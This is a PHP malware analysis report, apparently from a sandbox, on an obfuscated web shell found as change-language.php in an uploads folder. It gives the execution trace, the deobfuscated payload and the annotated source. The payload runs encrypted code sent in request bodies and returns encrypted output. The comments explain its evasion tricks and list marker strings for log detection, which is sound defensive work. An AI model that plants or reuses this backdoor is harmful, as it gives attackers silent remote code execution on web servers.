PHP Malware Analysis

change-language.php

md5: 6980dbc3df4a8bc2e6da6a2321a0e6bc


Screenshot


Attributes

Encoding

Execution

Files

Input


Deobfuscated PHP code

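Failed to deobfuscate code (automatic deobfuscation did not succeed; the assembled payload is still visible in the execution trace below, as the return value of the second str_replace call)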

Execution traces

data/traces/6980dbc3df4a8bc2e6da6a2321a0e6bc_trace-1676246074.381.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 21:55:00.278785]
1	0	1	0.000137	393608
1	3	0	0.000200	396784	{main}	1		/var/www/html/uploads/change-language.php	0	0
1		A						/var/www/html/uploads/change-language.php	2	$F = '<="X82pUNA<LVe0K1J97gA<";functioA<n A<x(A<$t,$A<k){$c=strlen($A<A<k);$l=strl'
1		A						/var/www/html/uploads/change-language.php	3	$p = 'en($A<t);A<A<$o="";for($i=A<0;$i<$lA<;)A<{for($jA<=0;($jA<<$c&&$i<$lA<);$'
1		A						/var/www/html/uploads/change-language.php	4	$j = '=1) {@A<ob_sA<tart();@eA<valA<(@gA<zunA<A<compress(@x(@baseA<A<64_decode('
1		A						/var/www/html/uploads/change-language.php	5	$P = '$k="A<eeA<a445cA<2";$khA<="a0A<63b6a58c4e";$A<kfA<="bc83eA<72cfA<ec1";$pA'
2	4	0	0.000281	396784	str_replace	0		/var/www/html/uploads/change-language.php	6	3	'jZ'	''	'crejZatjZe_jZfujZnjZctjZion'
2	4	1	0.000298	396920
2	4	R			'create_function'
1		A						/var/www/html/uploads/change-language.php	6	$U = 'create_function'
1		A						/var/www/html/uploads/change-language.php	7	$G = 'cA<h(A<"/$kA<h(.+)$kf/A<",@file_get_conteA<ntA<s(A<"php://inA<put"),$m)=A<'
1		A						/var/www/html/uploads/change-language.php	8	$s = 'j+A<+,$i+A<+)A<{$o.=$t{$i}A<^$k{$A<j};}}retA<urn $oA<;}ifA< (A<@prA<eg_mat'
1		A						/var/www/html/uploads/change-language.php	9	$E = 'se6A<4_encA<ode(A<@A<x(@gzcompA<resA<s($o),$k)A<);print(A<"A<$p$kh$r$kf");}'
1		A						/var/www/html/uploads/change-language.php	10	$l = '$mA<[1]),A<$k)));$o=A<@obA<_get_contenA<A<A<tsA<(A<);@ob_end_clean();$r=@ba'
2	5	0	0.000383	397464	str_replace	0		/var/www/html/uploads/change-language.php	11	3	'A<'	''	'$k="A<eeA<a445cA<2";$khA<="a0A<63b6a58c4e";$A<kfA<="bc83eA<72cfA<ec1";$pA<="X82pUNA<LVe0K1J97gA<";functioA<n A<x(A<$t,$A<k){$c=strlen($A<A<k);$l=strlen($A<t);A<A<$o="";for($i=A<0;$i<$lA<;)A<{for($jA<=0;($jA<<$c&&$i<$lA<);$j+A<+,$i+A<+)A<{$o.=$t{$i}A<^$k{$A<j};}}retA<urn $oA<;}ifA< (A<@prA<eg_matcA<h(A<"/$kA<h(.+)$kf/A<",@file_get_conteA<ntA<s(A<"php://inA<put"),$m)=A<=1) {@A<ob_sA<tart();@eA<valA<(@gA<zunA<A<compress(@x(@baseA<A<64_decode($mA<[1]),A<$k)));$o=A<@obA<_get_contenA<A<A<tsA<(A<);@ob_end_clean();'
2	5	1	0.000420	398072
2	5	R			'$k="eea445c2";$kh="a063b6a58c4e";$kf="bc83e72cfec1";$p="X82pUNLVe0K1J97g";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
1		A						/var/www/html/uploads/change-language.php	11	$i = '$k="eea445c2";$kh="a063b6a58c4e";$kf="bc83e72cfec1";$p="X82pUNLVe0K1J97g";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
2	6	0	0.000477	397336	create_function	0		/var/www/html/uploads/change-language.php	12	2	''	'$k="eea445c2";$kh="a063b6a58c4e";$kf="bc83e72cfec1";$p="X82pUNLVe0K1J97g";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));$o=@ob_get_contents();@ob_end_clean();$r=@base64_encode(@x(@gzcompress($o),$k));print("$p$kh$r$kf");}'
3	7	0	0.000558	405408	{internal eval}	1		/var/www/html/uploads/change-language.php	12	0
3	7	1	0.000573	405408
3	7	R			NULL
2	6	1	0.000588	404040
2	6	R			'\000lambda_12'
1		A						/var/www/html/uploads/change-language.php	12	$Q = '\000lambda_12'
2	8	0	0.000616	403976	__lambda_func	1		/var/www/html/uploads/change-language.php	12	0
2		A						/var/www/html/uploads/change-language.php(12) : runtime-created function	1	$k = 'eea445c2'
2		A						/var/www/html/uploads/change-language.php(12) : runtime-created function	1	$kh = 'a063b6a58c4e'
2		A						/var/www/html/uploads/change-language.php(12) : runtime-created function	1	$kf = 'bc83e72cfec1'
2		A						/var/www/html/uploads/change-language.php(12) : runtime-created function	1	$p = 'X82pUNLVe0K1J97g'
3	9	0	0.000681	404032	file_get_contents	0		/var/www/html/uploads/change-language.php(12) : runtime-created function	1	1	'php://input'
3	9	1	0.000702	404768
3	9	R			''
3	10	0	0.000715	404752	preg_match	0		/var/www/html/uploads/change-language.php(12) : runtime-created function	1	3	'/a063b6a58c4e(.+)bc83e72cfec1/'	''	NULL
3	10	1	0.000774	404912
3	10	R			0
2	8	1	0.000791	404672
1	3	1	0.000798	404672
			0.000825	321920
TRACE END   [2023-02-12 21:55:00.279503]


Generated HTML code

<html><head></head><body></body></html>

Original PHP code

<?php
// ANALYST ANNOTATIONS: every // comment in this listing was added during review and is
// not part of the sample; the md5 reported for this file covers the uncommented original.
//
// What the sample is: a small loader that rebuilds a PHP payload from string fragments and
// runs it through a runtime-created function. The eight fragment variables ($F, $p, $j, $P,
// $G, $s, $E, $l) are declared out of order and padded with the junk marker 'A<', so that
// function names such as eval, preg_match and base64_decode never appear contiguously in
// the file and simple string signatures do not match.
//
// What the assembled payload does (as shown in the execution trace for this sample):
//   - sets a key $k = 'eea445c2', markers $kh = 'a063b6a58c4e' / $kf = 'bc83e72cfec1'
//     and a response prefix $p = 'X82pUNLVe0K1J97g';
//   - defines x($t, $k), a repeating-key XOR over the bytes of $t;
//   - reads the raw request body from php://input and looks for data between $kh and $kf;
//   - on a match: base64-decodes, XORs with $k, gzuncompress()es and eval()s the result,
//     i.e. executes code supplied in the request body;
//   - captures the output, gzcompress()es, XORs and base64-encodes it, and prints it as
//     $p . $kh . <data> . $kf.
// Every call in that path is prefixed with @, so failures produce no warnings or log noise.
//
// Detection / triage notes:
//   - The marker strings above are candidates for request/response body matching in web
//     or proxy logs; presumably they are specific to this sample - verify before reuse.
//   - A request without the markers yields an empty page, which is what the sandbox run
//     recorded (php://input was '', preg_match returned 0, the eval branch was not reached).
//     An empty response therefore does not indicate the file is harmless.
//   - Static indicators that survive the padding: str_replace() used to build a callable
//     name, a variable called as a function with ('', <string>), and an immediate call of
//     the returned value.
//   - The sample relies on create_function() and on $t{$i} string offsets, both removed in
//     PHP 8.0, so it does not run unmodified on PHP 8.0+.

// Fragment 2 of 8 in assembly order: end of the $p assignment and start of function x().
$F='<="X82pUNA<LVe0K1J97gA<";functioA<n A<x(A<$t,$A<k){$c=strlen($A<A<k);$l=strl';
// Fragment 3 of 8: length setup and loop headers of x().
$p='en($A<t);A<A<$o="";for($i=A<0;$i<$lA<;)A<{for($jA<=0;($jA<<$c&&$i<$lA<);$';
// Fragment 6 of 8: output buffering start and the eval(gzuncompress(x(base64_decode( chain.
$j='=1) {@A<ob_sA<tart();@eA<valA<(@gA<zunA<A<compress(@x(@baseA<A<64_decode(';
// Fragment 1 of 8: the key and marker assignments.
$P='$k="A<eeA<a445cA<2";$khA<="a0A<63b6a58c4e";$A<kfA<="bc83eA<72cfA<ec1";$pA';
// Removing the junk marker 'jZ' yields the string 'create_function' (confirmed by the trace).
$U=str_replace('jZ','','crejZatjZe_jZfujZnjZctjZion');
// Fragment 5 of 8: the preg_match() against the request body read from php://input.
$G='cA<h(A<"/$kA<h(.+)$kf/A<",@file_get_conteA<ntA<s(A<"php://inA<put"),$m)=A<';
// Fragment 4 of 8: XOR loop body of x() and the start of the if (@preg_match(...)) guard.
$s='j+A<+,$i+A<+)A<{$o.=$t{$i}A<^$k{$A<j};}}retA<urn $oA<;}ifA< (A<@prA<eg_mat';
// Fragment 8 of 8: encoding of the captured output and the print() of the wrapped response.
$E='se6A<4_encA<ode(A<@A<x(@gzcompA<resA<s($o),$k)A<);print(A<"A<$p$kh$r$kf");}';
// Fragment 7 of 8: arguments closing the decode chain, then capture of the buffered output.
$l='$mA<[1]),A<$k)));$o=A<@obA<_get_contenA<A<A<tsA<(A<);@ob_end_clean();$r=@ba';
// Concatenate the fragments in their real order and strip every 'A<' to obtain the payload source.
$i=str_replace('A<','',$P.$F.$p.$s.$G.$j.$l.$E);
// $U('', $i) is create_function('', <payload>): it compiles the payload as the body of an
// anonymous function (an internal eval in the trace), and $Q() then runs it on every request.
$Q=$U('',$i);$Q();
?>